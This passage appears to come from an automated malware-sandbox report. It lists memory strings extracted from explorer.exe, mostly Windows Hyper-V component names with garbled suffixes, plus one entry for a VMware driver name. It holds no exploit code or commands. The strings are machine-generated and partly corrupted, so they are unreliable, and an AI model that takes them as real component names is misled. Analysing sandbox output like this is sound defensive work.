      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.19041.1_en-us_369e8b635061fdb326mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c17187447mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc792494c595902f8cmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66061fdb326mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.19041.1_none_d7dfb451bd621127d589a67mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.19041.1_en-us_299ac5951a49c2dedmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.19041.1_en-us_4373d0692dcd3a06cmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fdaefe65ac87mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e23a7mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98326mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.19041.1_none_2246f2e6f04413790mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.19041.1_en-us_c2edb075185521350mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.19041.1_none_50b60ffc14c70fb2mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0cmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2477112278.0000000005BDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c704070de83mm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2461198655.0000000000D41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $vmci.sysh
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.19041.1_en-us_8e6d1518accc0bf5mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479bddaeabc80a3525d60mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_ddaeabc80a3525d60mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.19041.1_none_34b87765e20dcc150953289cd4d0mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.19041.1_en-us_168291f09487ebd5c11bd5cdmumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b6191b2fdaefe65ac87mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d589a67mumm949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.1_none_97e0d8d7edeea164db9356d89m949.mummm65.mumum
      Source: explorer.exe, 00000012.00000003.2477563802.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2478508214.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475717815.0000000005718000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475376625.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2480822359.0000000006029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475941277.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476638018.0000000005938000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2482153714.0000000006D7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2475533019.00000000042BD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2483255126.0000000005AE1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2476334944.000000000571A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.19041.1_en-us_d314f4eb3925c8b5cmumm949.mummm65.mumum
